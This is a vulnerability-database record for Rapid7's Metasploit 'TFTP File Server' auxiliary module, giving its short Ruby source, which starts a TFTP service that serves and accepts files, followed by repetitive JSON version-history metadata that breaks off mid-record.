ID MSF:AUXILIARY/SERVER/TFTP Type metasploit Reporter Rapid7 Modified 2017-07-24T13:26:21
Description
This module provides a TFTP service
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/proto/tftp'
require 'tmpdir'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::TFTPServer
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'TFTP File Server',
'Description' => %q{
This module provides a TFTP service
},
'Author' => [ 'jduck', 'todb' ],
'License' => MSF_LICENSE,
'Actions' =>
[
[ 'Service' ]
],
'PassiveActions' =>
[
'Service'
],
'DefaultAction' => 'Service'
)
register_options(
[
OptAddress.new('SRVHOST', [ true, "The local host to listen on.", '0.0.0.0' ]),
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 69 ]),
OptPath.new('TFTPROOT', [ true, "The TFTP root directory to serve files from", Dir.tmpdir ]),
OptPath.new('OUTPUTPATH', [ true, "The directory in which uploaded files will be written.", Dir.tmpdir ])
])
end
def srvhost
datastore['SRVHOST'] || '0.0.0.0'
end
def srvport
datastore['SRVPORT'] || 69
end
def run
print_status("Starting TFTP server on #{srvhost}:#{srvport}...")
@tftp = Rex::Proto::TFTP::Server.new(
srvport,
srvhost,
{}
)
@tftp.set_tftproot(datastore['TFTPROOT'])
print_status("Files will be served from #{datastore['TFTPROOT']}")
@tftp.set_output_dir(datastore['OUTPUTPATH'])
print_status("Uploaded files will be saved in #{datastore['OUTPUTPATH']}")
# Individual virtual files can be served here -
#@tftp.register_file("ays", "A" * 2048) # multiple of 512 on purpose
@tftp.start
add_socket(@tftp.sock)
# Wait for finish..
while @tftp.thread.alive?
sleep 3
end
vprint_status("Stopping TFTP server")
@tftp.stop
end
end
{"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "de71383e686baf40dc661000113b42a5", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-30T14:36:53", "history": [{"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "2010-07-08T23:34:33", "modified": "2017-05-03T20:42:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.rapid7.com/db/modules/auxiliary/server/tftp", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-07-02T23:27:11", "history": [], "viewCount": 2, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\n\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2017-07-02T23:27:11", "differentElements": ["modified", "sourceData"], "edition": 1}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.rapid7.com/db/modules/auxiliary/server/tftp", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-07-24T19:25:36", "history": [], "viewCount": 3, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2017-07-24T19:25:36", "differentElements": ["href"], "edition": 2}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-08-21T15:32:07", "history": [], "viewCount": 3, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2017-08-21T15:32:07", "differentElements": ["modified", "published"], "edition": 3}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-10-19T15:43:52", "history": [], "viewCount": 3, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2017-10-19T15:43:52", "differentElements": ["modified", "published"], "edition": 4}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-10-19T23:45:32", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 7.6, "modified": "2017-10-19T23:45:32"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2017-10-19T23:45:32", "differentElements": ["modified", "published"], "edition": 5}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-12-26T02:03:00", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 7.6, "modified": "2017-12-26T02:03:00"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2017-12-26T02:03:00", "differentElements": ["modified", "published"], "edition": 6}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-12-26T04:03:34", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 7.6, "modified": "2017-12-26T04:03:34"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2017-12-26T04:03:34", "differentElements": ["modified", "published"], "edition": 7}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-12-26T06:08:04", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 7.6, "modified": "2017-12-26T06:08:04"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2017-12-26T06:08:04", "differentElements": ["modified", "published"], "edition": 8}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-12-26T22:04:38", "history": [], "viewCount": 7, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2017-12-26T22:04:38", "differentElements": ["modified", "published"], "edition": 9}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-22T05:33:28", "history": [], "viewCount": 7, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2018-08-22T05:33:28", "differentElements": ["modified", "published"], "edition": 10}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": 